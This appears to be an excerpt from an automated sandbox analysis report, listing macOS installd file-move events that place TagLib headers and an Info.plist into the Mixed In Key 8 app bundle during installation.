              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/PrivateHeaders/.BC.T_HBpmSH -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/PrivateHeaders/tagutils.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/PrivateHeaders/.BC.T_fqpQMe -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/PrivateHeaders/tzlib.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Resources/.BC.T_RDa8Ms -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Resources/Info.plistJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_RdoxTJ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/apefile.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_426dSg -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/id3v2footer.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_pjpdlx -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/flacpicture.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_IEc6ZJ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/attachedpictureframe.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_UB9W4E -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/flacmetadatablock.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_b4ZKXc -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/mp4file.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_qYqofz -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/unknownframe.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_qxS8DU -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/wavpackproperties.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_89UblS -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/id3v1tag.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_3LizoG -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/modproperties.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_zMt2f2 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/apeproperties.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_6TL4xV -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tfile.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_bsTVzw -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tbytevector.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_myM1Uw -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/wavpackfile.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_1jdcKQ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/unsynchronizedlyricsframe.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_gOxrRx -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/mp4item.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_9SuRGK -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/id3v2extendedheader.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_YrCsde -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/asfpicture.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_1us86L -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/aiffproperties.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_k81phZ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/modfileprivate.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_eqQ8rT -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/generalencapsulatedobjectframe.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_PQk0cD -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tstring.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_ONujt0 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/apeitem.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_qhj5eo -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/id3v2header.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_46O1k3 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tagunion.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_aklzlB -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tableofcontentsframe.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_YQXOKe -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/id3v2frame.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_kjQ5bd -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/id3v2framefactory.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_4x6fIv -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tag.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_JK1HYP -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/audioproperties.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_qNXSQX -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/oggflacfile.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_0p2dhG -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/tbytevectorlist.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_w73XOs -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/podcastframe.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_l5Nf6w -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/oggfile.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_J7lPse -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/flacunknownmetadatablock.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_Kw2Rhd -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/xingheader.hJump to behavior
